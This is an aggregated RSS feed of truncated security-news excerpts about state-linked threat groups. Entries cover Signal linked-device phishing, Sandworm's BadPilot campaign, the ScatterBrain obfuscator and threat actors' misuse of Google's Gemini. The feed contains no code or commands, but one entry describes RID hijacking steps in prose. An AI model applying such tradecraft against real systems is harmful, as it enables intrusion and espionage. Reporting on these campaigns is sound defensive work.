This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2025-05-10T23:18:03+00:00 www.secnews.physaphae.fr Reversemode - Blog de reverser IntroductionYesterday afternoon, I was writing what should have been the regular newsletter when the power suddenly went out. I wasn\'t alarmed at all because I live in a mountain area, and power outages like this happen several times a year. It was a slightly windy day, so I assumed that maybe a tree had cracked and hit a low-voltage line or something similar. But, as it turns out, that wasn\'t the case. Instead, something unprecedented occurred, a \'zero energy\' event: the power grid in Spain and Portugal went down completely.As we can see from the following graph coming from Red Eléctrica Española (transmission system operator responsible for managing the Spanish electricity system), at 12:35pm suddenly 15 GW of generation power went \'missing\'. As the prime minister would explain during a press release: "in 5 seconds, 60% of the country\'s demand disappeared from the system".The interconnected power system is one of the most complex systems ever built. It is beyond the scope of this article to provide a detailed technical assessment of all possible non-cyber scenarios that could contribute to a \'black swan\' event. In fact, investigations into large-scale power outages typically take months to reach reliable conclusions. Therefore, I will leave this task to the experts, who have access to the necessary data to conduct such a complex analysis.However, there is specific information suggesting that a potential cyber attack could be behind this. For example:https://www.larazon.es/economia/cni-apunta-ciberataque-como-posible-causa-apagon_20250428680f7e19319ae75da4ba8c32.htmlThe President of the regional government of Andalusia (Spain) claims that, after consulting with cybersecurity experts, the massive power outage is likely the result of a cyber attack.https://www.eleconomista.es/energia/noticias/13337515/04/25/juanma-moreno-apunta-a-un-ciberataque-como-posible-causa-del-gran-apagon-en-espana.htmlMeanwhile, top European figures such as the European Council p]]> 2025-04-29T11:04:11+00:00 https://www.reversemode.com/2025/04/spains-blackout-cyber-or-not-unbiased.html www.secnews.physaphae.fr/article.php?IdArticle=8669358 False Ransomware,Malware,Threat,Studies,Prediction,Technical APT 44 3.0000000000000000 GB Hacker - Blog de reverseur Les chercheurs en cybersécurité sont tombés sur un trésor d'outils et de scripts opérationnels liés aux logiciels malveillants de Keyplug, associés au groupe de menaces Redgolf, également connu sous le nom d'APT41.  Le serveur, qui a été exposé par inadvertance pendant moins de 24 heures, a fourni un aperçu sans précédent des tactiques, techniques et procédures sophistiquées (TTP) employés par cette avancée […] avancée.

---

>Cybersecurity researchers have stumbled upon a treasure trove of operational tools and scripts linked to the KeyPlug malware, associated with the threat group RedGolf, also known as APT41.  The server, which was inadvertently exposed for less than 24 hours, provided an unprecedented glimpse into the sophisticated tactics, techniques, and procedures (TTPs) employed by this advanced […] ]]> 2025-04-18T11:53:49+00:00 https://gbhackers.com/keyplug-malware-server/ www.secnews.physaphae.fr/article.php?IdArticle=8664457 False Malware,Tool,Threat APT 41 3.0000000000000000 Cyble - CyberSecurity Firm Présentation Selon un nouveau rapport Cyble, les hacktivistes vont de plus en plus au-delà des activités traditionnelles telles que les attaques DDOS et les défaillances de sites Web en infrastructure critique plus sophistiquée et attaques de ransomwares. Dans un rapport pour les clients, Cyble a déclaré que le hacktivisme s'est «transformé en un instrument complexe de guerre hybride» avec la montée en puissance des groupes qui ont adopté des techniques d'attaque plus sophistiquées plus généralement associées aux acteurs de l'État-nation et aux groupes de menaces motivés financièrement. Hacktivism "ne se limite plus aux explosions idéologiques marginales", selon le rapport. «Il s'agit maintenant d'un appareil de cyber-insurrection décentralisé, capable de façonner les récits géopolitiques, de déstabiliser les systèmes critiques et de s'engager directement dans des conflits mondiaux à travers le domaine numérique.» Le rapport CYBLE a examiné les groupes hacktiviste les plus actifs au premier trimestre de 2025, les nations et les secteurs les plus ciblés, les techniques d'attaque émergentes, et plus encore. Les groupes hacktiviste les plus actifs ciblent l'infrastructure critique Les hacktivistes pro-russes étaient les plus actifs au premier trimestre, dirigés par NONAME057 (16), Hacktivist Sandworm]]> 2025-04-15T08:22:39+00:00 https://cyble.com/blog/hacktivists-infrastructure-move-into-ransomware/ www.secnews.physaphae.fr/article.php?IdArticle=8662999 False Ransomware,Tool,Vulnerability,Threat,Legislation,Industrial,Prediction,Cloud,Technical APT 44 3.0000000000000000 Cyble - CyberSecurity Firm Overview  Google Threat Intelligence Group (GTIG) has identified multiple Russia-aligned threat actors actively targeting Signal Messenger accounts as part of a multi-year cyber espionage operation. The campaign, likely driven by Russia\'s intelligence-gathering objectives during its invasion of Ukraine, aims to compromise the secure communications of military personnel, politicians, journalists, and activists.  The tactics observed in this campaign include phishing attacks abusing Signal\'s linked devices feature, malicious JavaScript payloads and malware designed to steal Signal messages from compromised Android and Windows devices. While the focus remains on Ukrainian targets, the threat is expected to expand globally as adversaries refine their techniques.  Google has partnered with Signal to introduce security enhancements that mitigate these attack vectors, urging users to update to the latest versions of the app.  Tactics Used to Compromise Signal Accounts  Exploiting Signal\'s "Linked Devices" Feature  Russia-aligned threat actors have manipulated Signal\'s legitimate linked devices functionality to gain persistent access to victim accounts. By tricking users into scanning malicious QR codes, attackers can link an actor-controlled device to the victim\'s account, enabling real-time message interception without full device compromise.  The phishing methods used to deliver these malicious QR codes include:  Fake Signal group invites containing altered JavaScript redirects.  Phishing pages masquerading as Ukrainian military applications.  ]]> 2025-02-20T13:21:16+00:00 https://cyble.com/blog/germany-strengthening-cybersecurity-2/ www.secnews.physaphae.fr/article.php?IdArticle=8649243 True Malware,Tool,Vulnerability,Threat,Mobile,Cloud,Conference APT 44 2.0000000000000000 Mandiant - Blog Sécu de Mandiant Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia\'s intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia\'s re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional threat actors and regions outside the Ukrainian theater of war. Signal\'s popularity among common targets of surveillance and espionage activity-such as military personnel, politicians, journalists, activists, and other at-risk communities-has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfil a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using similar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats. We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features. Phishing Campaigns Abusing Signal\'s "Linked Devices" Feature The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app\'s legitimate "linked devices" feature that enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim\'s account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, providing a persistent means to eavesdrop on the victim\'s secure conversations without the need for full-device compromise. ]]> 2025-02-19T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/ www.secnews.physaphae.fr/article.php?IdArticle=8648980 False Malware,Threat,Mobile,Cloud,Commercial APT 44 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The China-linked threat actor known as Winnti has been attributed to a new campaign dubbed RevivalStone that targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024. The activity, detailed by Japanese cybersecurity company LAC, overlaps with a threat cluster tracked by Trend Micro as Earth Freybug, which has been assessed to be a subset within the APT41]]> 2025-02-18T15:22:00+00:00 https://thehackernews.com/2025/02/winnti-apt41-targets-japanese-firms-in.html www.secnews.physaphae.fr/article.php?IdArticle=8648844 False Threat,Prediction APT 41 3.0000000000000000 IndustrialCyber - cyber risk firms for industrial Microsoft has published its first research on a subgroup within the Russian state actor Seashell Blizzard, detailing a... ]]> 2025-02-13T22:27:57+00:00 https://industrialcyber.co/ransomware/microsoft-details-seashell-blizzard-badpilot-campaign-targeting-energy-telecom-government-sectors/ www.secnews.physaphae.fr/article.php?IdArticle=8648429 False None APT 44 4.0000000000000000 HackRead - Chercher Cyber Russian GRU-linked hackers exploit known software flaws to breach critical networks worldwide, targeting the United States and the…]]> 2025-02-13T21:27:54+00:00 https://hackread.com/microsoft-badpilot-campaign-seashell-blizzard-usa-uk/ www.secnews.physaphae.fr/article.php?IdArticle=8648424 False Threat APT 44 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet]]> 2025-02-13T19:56:00+00:00 https://thehackernews.com/2025/02/north-korean-apt43-uses-powershell-and.html www.secnews.physaphae.fr/article.php?IdArticle=8648389 False Threat APT 43 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Microsoft found that Russian state actor Seashell Blizzard has deployed an initial access subgroup to gain persistent access in a range of high-value global targets]]> 2025-02-13T12:00:00+00:00 https://www.infosecurity-magazine.com/news/russian-seashell-blizzard-initial/ www.secnews.physaphae.fr/article.php?IdArticle=8648351 False None APT 44 3.0000000000000000 InformationSecurityBuzzNews - Site de News Securite The Russia-linked threat actor known as Seashell Blizzard has assigned one of its subgroups to gain initial access to internet-facing infrastructure and establish long-term persistence within targeted entity, a Microsoft report has revealed.  Also dubbed APT44, BlackEnergy Lite, Sandworm, Telebots, and Voodoo Bear, Seashell Blizzard has been active since at least 2009 and is believed [...]]]> 2025-02-13T06:02:16+00:00 https://informationsecuritybuzz.com/russia-linked-seashell-blizzard-intens/ www.secnews.physaphae.fr/article.php?IdArticle=8648314 False Threat APT 44 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A subgroup within the infamous Russian state-sponsored hacking group known as Sandworm has been attributed to a multi-year initial access operation dubbed BadPilot that stretched across the globe. "This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable Seashell Blizzard to persist on high-value targets and support tailored network operations," the]]> 2025-02-12T22:32:00+00:00 https://thehackernews.com/2025/02/microsoft-uncovers-sandworm-subgroups.html www.secnews.physaphae.fr/article.php?IdArticle=8648239 False None APT 44 3.0000000000000000 Recorded Future - FLux Recorded Future The BadPilot hackers have expanded their focus beyond Ukraine and Eastern Europe, gaining initial access to dozens of strategically important organizations across the U.S. and U.K.]]> 2025-02-12T18:14:48+00:00 https://therecord.media/sandworm-subgroup-russia-europe www.secnews.physaphae.fr/article.php?IdArticle=8648255 False None APT 44 3.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber A subgroup of Seashell Blizzard exploited public vulnerabilities in internet-facing systems, Microsoft researchers said.

---

>A subgroup of Seashell Blizzard exploited public vulnerabilities in internet-facing systems, Microsoft researchers said. ]]> 2025-02-12T17:58:47+00:00 https://cyberscoop.com/russian-state-threat-group-shifts-focus/ www.secnews.physaphae.fr/article.php?IdArticle=8648237 False Vulnerability,Threat APT 44 3.0000000000000000 Dark Reading - Informationweek Branch Sandworm (aka Seashell Blizzard) has an initial access wing called "BadPilot" that uses standard intrusion tactics to spread Russia\'s tendrils around the world.]]> 2025-02-12T17:00:00+00:00 https://www.darkreading.com/threat-intelligence/microsoft-russian-sandworm-apt-exploits-edge-bugs-globally www.secnews.physaphae.fr/article.php?IdArticle=8648232 False None APT 44 3.0000000000000000 Mandiant - Blog Sécu de Mandiant 2025-02-11T20:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat/ www.secnews.physaphae.fr/article.php?IdArticle=8648141 False Ransomware,Malware,Tool,Vulnerability,Threat,Legislation,Medical,Cloud,Technical APT 41,APT 38,APT 29,APT 43,APT 44 3.0000000000000000 Techworm - News said in its report. Google tracked this activity to more than ten Iran-backed groups, more than twenty China-backed groups, and nine North Korean-backed groups. For instance, Iranian threat actors were the biggest users of Gemini, using it for a wide range of purposes, including research on defense organizations, vulnerability research, and creating content for campaigns. In particular, the group APT42 (which accounted for over 30% of Iranian APT actors) focused on crafting phishing campaigns to target government agencies and corporations, conducting reconnaissance on defense experts and organizations, and generating content with cybersecurity themes. Chinese APT groups primarily used Gemini to conduct reconnaissance, script and develop, troubleshoot code, and research how to obtain deeper access to target networks through lateral movement, privilege escalation, data exfiltration, and detection evasion. North Korean APT hackers were observed using Gemini to support multiple phases of the attack lifecycle, including researching potential infrastructure and free hosting providers, reconnaissance on target organizations, payload development, and help with malicious scripting and evasion methods. “Of note, North Korean actors also used Gemini to draft cover letters and research jobs-activities that would likely support North Korea’s efforts to place clandestine IT workers at Western companies,” the company noted. “One North Korea-backed group utilized Gemini to draft cover letters and proposals for job descriptions, researched average salaries for specific jobs, and asked about jobs on LinkedIn. The group also used Gemini for information about overseas employee exchanges. Many of the topics would be common for anyone researching and applying for jobs.” Meanwhile, Russian APT actors demonstrated limited use of Gemini, primarily for coding tasks such as converting publicly available malware into different programming languages and incorporating encryption functions into existing code. They may have avoided using Gemini for operational security reasons, opting to stay off Western-controlled platforms to avoid monitoring their activities or using Russian-made AI tools. Google said the Russian hacking group’s use of Gemini has been relatively limited, possibly because it attempted to prevent Western platforms from monitoring its activities ]]> 2025-01-31T19:21:04+00:00 https://www.techworm.net/2025/01/hackers-google-gemini-ai-for-cyber-ops.html www.secnews.physaphae.fr/article.php?IdArticle=8645260 False Malware,Tool,Vulnerability,Threat,Legislation,Cloud APT 42 3.0000000000000000 Mandiant - Blog Sécu de Mandiant science, technology, and beyond. In cybersecurity, AI is poised to transform digital defense, empowering defenders and enhancing our collective security. Large language models (LLMs) open new possibilities for defenders, from sifting through complex telemetry to secure coding, vulnerability discovery, and streamlining operations. However, some of these same AI capabilities are also available to attackers, leading to understandable anxieties about the potential for AI to be misused for malicious purposes.  Much of the current discourse around cyber threat actors\' misuse of AI is confined to theoretical research. While these studies demonstrate the potential for malicious exploitation of AI, they don\'t necessarily reflect the reality of how AI is currently being used by threat actors in the wild. To bridge this gap, we are sharing a comprehensive analysis of how threat actors interacted with Google\'s AI-powered assistant, Gemini. Our analysis was grounded by the expertise of Google\'s Threat Intelligence Group (GTIG), which combines decades of experience tracking threat actors on the front lines and protecting Google, our users, and our customers from government-backed attackers, targeted 0-day exploits, coordinated information operations (IO), and serious cyber crime networks. We believe the private sector, governments, educational institutions, and other stakeholders must work together to maximize AI\'s benefits while also reducing the risks of abuse. At Google, we are committed to developing responsible AI guided by our principles, and we share ]]> 2025-01-29T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai/ www.secnews.physaphae.fr/article.php?IdArticle=8644222 False Ransomware,Malware,Tool,Vulnerability,Threat,Studies,Legislation,Mobile,Industrial,Cloud,Technical,Commercial APT 41,APT 43,APT 42 3.0000000000000000 Mandiant - Blog Sécu de Mandiant Introduction Since 2022, Google Threat Intelligence Group (GTIG) has been tracking multiple cyber espionage operations conducted by China-nexus actors utilizing POISONPLUG.SHADOW. These operations employ a custom obfuscating compiler that we refer to as "ScatterBrain," facilitating attacks against various entities across Europe and the Asia Pacific (APAC) region. ScatterBrain appears to be a substantial evolution of ScatterBee, an obfuscating compiler previously analyzed by PWC. GTIG assesses that POISONPLUG is an advanced modular backdoor used by multiple distinct, but likely related threat groups based in the PRC, however we assess that POISONPLUG.SHADOW usage appears to be further restricted to clusters associated with APT41. GTIG currently tracks three known POISONPLUG variants: POISONPLUG POISONPLUG.DEED POISONPLUG.SHADOW POISONPLUG.SHADOW-often referred to as "Shadowpad," a malware family name first introduced by Kaspersky-stands out due to its use of a custom obfuscating compiler specifically designed to evade detection and analysis. Its complexity is compounded by not only the extensive obfuscation mechanisms employed but also by the attackers\' highly sophisticated threat tactics. These elements collectively make analysis exceptionally challenging and complicate efforts to identify, understand, and mitigate the associated threats it poses. In addressing these challenges, GTIG collaborates closely with the FLARE team to dissect and analyze POISONPLUG.SHADOW. This partnership utilizes state-of-the-art reverse engineering techniques and comprehensive threat intelligence capabilities required to mitigate the sophisticated threats posed by this threat actor. We remain dedicated to advancing methodologies and fostering innovation to adapt to and counteract the ever-evolving tactics of threat actors, ensuring the security of Google and our customers against sophisticated cyber espionage operations. Overview In this blog post, we present our in-depth analysis of the ScatterBrain obfuscator, which has led to the development of a complete stand-alone static deobfuscator library independent of any binary analysis frameworks. Our analysis is based solel]]> 2025-01-28T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/scatterbrain-unmasking-poisonplug-obfuscator/ www.secnews.physaphae.fr/article.php?IdArticle=8643871 False Malware,Tool,Threat,Studies,Patching,Cloud APT 41 2.0000000000000000 Techworm - News wrote in a blog post published on Thursday. In Windows, a Relative Identifier (RID) is part of a Security Identifier (SID), which exclusively distinguishes each user and group within a domain. For instance, an administrator account will have a RID value of “500”, “501” for guest accounts, “512” for the domain admins group, and for regular users, the RID will start from the value “of 1000”. In a RID hijacking attack, hackers change the RID of a low-privilege account to the same value as an administrator account. As a result, Windows grants administrative privileges to the account. However, to pull this off, attackers need access to the SAM (Security Account Manager) registry, which requires them to already have SYSTEM-level access to the targeted machine for modification. Attackers typically use tools such as PsExec and JuicyPotato to escalate their privileges and launch a SYSTEM-level command prompt. While SYSTEM access is the highest privilege in Windows, it has certain limitations: it doesn\'t allow remote access, cannot interact with GUI apps, generates noisy activity that can be easily detected and doesn\'t persist after a system reboot. To work around these issues, Andariel first created a hidden, low-privilege local user account by appending a “$” character to its username. This made the account invisible in regular listings but still accessible in the SAM registry. The attackers then carried out RID hijacking to escalate the account’s privileges to the administrator level. According to the researchers, Andariel added the modified account to the Remote Desktop Users and Administrators groups, giving them more control over the system. The group tweaked the SAM registry using custom malware and an open-source tool to execute the RID hijacking. Although SYSTEM access could allow the direct creation of administrator accounts, this method is less conspicuous, making it difficult to detect and prevent. To avoid detection, Andariel also exported and backed up the modified registry settings, deleted the rogue account, and restored it later from the backup when needed, bypassing system logs and making detection even harder. To reduce the risk of RID hijacking, system administrators should implement proactive measures such as: Use the Local Security Authority (LSA) Subsystem Service to monitor unusual login attempts and password changes. Prevent unauthorized access to the SAM registry. Restricting the use of tools like PsExec and JuicyPotato. Disabling guest accounts. Enforcing multi-factor authentication (MFA) for all user accounts, including low-privileged ones.

---

Cybersecurity researchers at AhnLab have discovered that a North Korean threat group uses malicious files to hijack RIDs and grant admin access to low-privilege Windows accounts. According to ASEC researchers, AhnLab’s security intelligence center, the hacking group behind the attack is the “Andariel” threat group, linked to North Korea’s Lazarus hacker group. “RID Hijacking is ]]> 2025-01-25T20:07:25+00:00 https://www.techworm.net/2025/01/hacker-rid-hijacking-create-admin-accounts-windows.html www.secnews.physaphae.fr/article.php?IdArticle=8642525 False Malware,Tool,Threat APT 38,APT 45 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-30T19:16:07+00:00 https://community.riskiq.com/article/14ca8afc www.secnews.physaphae.fr/article.php?IdArticle=8631775 False Malware,Tool,Vulnerability,Threat APT 45 2.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Summary DLL side-loading is a popular technique used by threat actors to execute malicious payloads under the umbrella of a benign, usually legitimate, executable. This allows the threat actor to exploit whitelists in security products that exclude trusted executables from detection. Among others, this technique has been leveraged by APT41 to deploy DUSTTRAP and Daggerfly […]

---

>Summary DLL side-loading is a popular technique used by threat actors to execute malicious payloads under the umbrella of a benign, usually legitimate, executable. This allows the threat actor to exploit whitelists in security products that exclude trusted executables from detection. Among others, this technique has been leveraged by APT41 to deploy DUSTTRAP and Daggerfly […] ]]> 2024-12-13T15:00:00+00:00 https://www.netskope.com/blog/new-yokai-side-loaded-backdoor-targets-thai-officials www.secnews.physaphae.fr/article.php?IdArticle=8624596 False Threat APT 41 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-11T22:38:07+00:00 https://community.riskiq.com/article/9dd28182 www.secnews.physaphae.fr/article.php?IdArticle=8623712 False Malware,Tool,Threat,Cloud APT 41 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-09T12:22:03+00:00 https://community.riskiq.com/article/86d339a0 www.secnews.physaphae.fr/article.php?IdArticle=8622260 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Industrial,Prediction APT 45 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-06T16:17:50+00:00 https://community.riskiq.com/article/ccb7bd15 www.secnews.physaphae.fr/article.php?IdArticle=8620767 False Ransomware,Tool,Vulnerability,Threat APT 45 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-27T20:21:51+00:00 https://community.riskiq.com/article/c958d17f www.secnews.physaphae.fr/article.php?IdArticle=8618094 False Ransomware,Tool,Threat APT 45 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-22T21:45:45+00:00 https://community.riskiq.com/article/2af97093 www.secnews.physaphae.fr/article.php?IdArticle=8616252 False Ransomware,Malware,Tool,Vulnerability,Threat APT 45 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-18T12:22:31+00:00 https://community.riskiq.com/article/2560112c www.secnews.physaphae.fr/article.php?IdArticle=8613484 False Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Medical,Cloud,Technical APT 41,APT 38 3.0000000000000000 Dark Reading - Informationweek Branch The China-affiliated group is using the highly modular DeepData framework to target organizations in South Asia.]]> 2024-11-13T22:39:34+00:00 https://www.darkreading.com/cyberattacks-data-breaches/toolkit-expands-apt41s-surveillance-powers www.secnews.physaphae.fr/article.php?IdArticle=8610664 False None APT 41 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-13T20:50:44+00:00 https://community.riskiq.com/article/1444d044 www.secnews.physaphae.fr/article.php?IdArticle=8610633 False Ransomware,Malware,Tool,Threat APT 45 2.0000000000000000 BlackBerry - Fabricant Matériel et Logiciels The threat actor behind LightSpy has expanded their toolset with the introduction of DeepData, a modular Windows-based surveillance framework that significantly broadens their espionage capabilities.]]> 2024-11-12T09:01:00+00:00 https://blogs.blackberry.com/en/2024/11/lightspy-apt41-deploys-advanced-deepdata-framework-in-targeted-southern-asia-espionage-campaign www.secnews.physaphae.fr/article.php?IdArticle=8610605 False Threat APT 41 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-11T18:57:29+00:00 https://community.riskiq.com/article/048b77c8 www.secnews.physaphae.fr/article.php?IdArticle=8609479 False Ransomware,Malware,Tool,Threat,Prediction,Medical,Cloud APT 45 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-04T12:25:16+00:00 https://community.riskiq.com/article/d6da7f0d www.secnews.physaphae.fr/article.php?IdArticle=8605948 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Prediction,Medical,Cloud,Technical APT 41,APT 28,APT 31,Guam 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-31T20:29:50+00:00 https://community.riskiq.com/article/798c0fdb www.secnews.physaphae.fr/article.php?IdArticle=8604363 False Malware,Tool,Vulnerability,Threat,Legislation,Cloud APT 41,APT 31 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-31T19:07:37+00:00 https://community.riskiq.com/article/393b61a9 www.secnews.physaphae.fr/article.php?IdArticle=8604347 False Ransomware,Malware,Tool,Threat,Prediction APT 45 2.0000000000000000 Dark Reading - Informationweek Branch The prominent state-sponsored advanced persistent threat (APT), aka Jumpy Pisces, appears to be moving away from its primary cyber-espionage motives and toward wreaking widespread disruption and damage.]]> 2024-10-31T15:28:56+00:00 https://www.darkreading.com/endpoint-security/north-korea-andariel-play-ransomware www.secnews.physaphae.fr/article.php?IdArticle=8604255 False Ransomware,Threat APT 45 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Threat actors in North Korea have been implicated in a recent incident that deployed a known ransomware family called Play, underscoring their financial motivations. The activity, observed between May and September 2024, has been attributed to a threat actor tracked as Jumpy Pisces, which is also known as Andariel, APT45, DarkSeoul, Nickel Hyatt, Onyx Sleet (formerly Plutonium), Operation Troy,]]> 2024-10-30T21:14:00+00:00 https://thehackernews.com/2024/10/north-korean-group-collaborates-with.html www.secnews.physaphae.fr/article.php?IdArticle=8603784 False Ransomware,Threat APT 15,APT 45 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The prolific Chinese nation-state actor known as APT41 (aka Brass Typhoon, Earth Baku, Wicked Panda, or Winnti) has been attributed to a sophisticated cyber attack targeting the gambling and gaming industry. "Over a period of at least six months, the attackers stealthily gathered valuable information from the targeted company including, but not limited to, network configurations, user passwords,]]> 2024-10-21T18:38:00+00:00 https://thehackernews.com/2024/10/chinese-nation-state-hackers-apt41-hit.html www.secnews.physaphae.fr/article.php?IdArticle=8601022 False None APT 41 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-10T21:13:00+00:00 https://community.riskiq.com/article/998e3172 www.secnews.physaphae.fr/article.php?IdArticle=8595647 False Ransomware,Malware,Tool,Threat,Technical APT 41 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-08T05:14:51+00:00 https://community.riskiq.com/article/6bedb4b5 www.secnews.physaphae.fr/article.php?IdArticle=8594036 False Malware,Tool,Threat,Industrial APT 45 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-07T16:54:11+00:00 https://community.riskiq.com/article/33015049 www.secnews.physaphae.fr/article.php?IdArticle=8593765 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Prediction,Cloud APT 37,APT 45 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Threat actors with ties to North Korea have been observed leveraging two new malware strains dubbed KLogEXE and FPSpy. The activity has been attributed to an adversary tracked as Kimsuky, which is also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), Sparkling Pisces, Springtail, and Velvet Chollima. "These samples enhance Sparkling Pisces\' already extensive arsenal]]> 2024-09-26T17:58:00+00:00 https://thehackernews.com/2024/09/n-korean-hackers-deploy-new-klogexe-and.html www.secnews.physaphae.fr/article.php?IdArticle=8585629 False Malware,Threat APT 43 2.0000000000000000 Dark Reading - Informationweek Branch How the Kimsuky nation-state group and other threat actors are exploiting poor email security - and what organizations can do to defend themselves.]]> 2024-09-20T01:00:00+00:00 https://www.darkreading.com/threat-intelligence/north-korean-apt-bypasses-dmarc-email-cyber-espionage-attacks www.secnews.physaphae.fr/article.php?IdArticle=8579992 False Threat APT 43 4.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-09-02T19:54:58+00:00 https://community.riskiq.com/article/161e114f www.secnews.physaphae.fr/article.php?IdArticle=8568711 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Medical,Cloud APT 41,APT 32 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Cybersecurity researchers have unearthed new network infrastructure set up by Iranian threat actors to support activities linked to the recent targeting of U.S. political campaigns. Recorded Future\'s Insikt Group has linked the infrastructure to a threat it tracks as GreenCharlie, an Iran-nexus cyber threat group that overlaps with APT42, Charming Kitten, Damselfly, Mint Sandstorm (formerly]]> 2024-08-30T16:45:00+00:00 https://thehackernews.com/2024/08/iranian-hackers-set-up-new-network-to.html www.secnews.physaphae.fr/article.php?IdArticle=8566822 False Threat APT 35,APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - Israel ## Snapshot Mandiant has disclosed details of a counterintelligence campaign suspected to be linked to Iran, targeting Iranians and perceived domestic threats who may collaborate with foreign intelligence agencies, especially those in Israel. ## Description The operation aims to gather personal and professional data, potentially aiding Iranian intelligence in identifying collaborators with Iran\'s adversaries and tracking human intelligence (HUMINT) activities against Iran. The campaign likely targets Iranian dissidents, activists, and Farsi speakers both inside and outside Iran. Mandiant attributes the campaign to Iran with high confidence due to its tactics, techniques, and procedures (TTPs). Mandiant asseses there is some overlap with APT42, a known Iranian cyber-espionage group associated with the Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization. The campaign disseminates over 35 fake recruitment websites via social media, posing as Israeli human resources firms to lure targets into providing sensitive information. The operation has been active since at least 2017 and has parallels with previous efforts targeting Arabic speakers linked to Syria and Hezbollah, suggesting a broader counterintelligence strategy. ## References [I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation](https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/). Mandiant (accessed 2024-08-29) ## Copyright **© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.]]> 2024-08-30T15:08:41+00:00 https://community.riskiq.com/article/69325d88 www.secnews.physaphae.fr/article.php?IdArticle=8566940 False Cloud APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-08-28T20:46:51+00:00 https://community.riskiq.com/article/e3cd79c3 www.secnews.physaphae.fr/article.php?IdArticle=8565688 False Ransomware,Malware,Tool,Vulnerability,Threat,Technical APT 41 3.0000000000000000 Mandiant - Blog Sécu de Mandiant Today Mandiant is releasing details of a suspected Iran-nexus counterintelligence operation aimed at collecting data on Iranians and domestic threats who may be collaborating with intelligence and security agencies abroad, particularly in Israel.  The data collected by this campaign may support the Iranian intelligence apparatus in pinpointing individuals who are interested in collaborating with Iran\'s perceived adversarial countries. The collected data may be leveraged to uncover human intelligence (HUMINT) operations conducted against Iran and to persecute any Iranians suspected to be involved in these operations. These may include Iranian dissidents, activists, human rights advocates, and Farsi speakers living in and outside Iran. Mandiant assesses with high confidence this campaign was operated on behalf of Iran\'s regime, based on its tactics, techniques, and procedures (TTPs), themes, and targeting. In addition, we observed a weak overlap between this campaign and APT42, an Iran-nexus threat actor suspected to operate on behalf 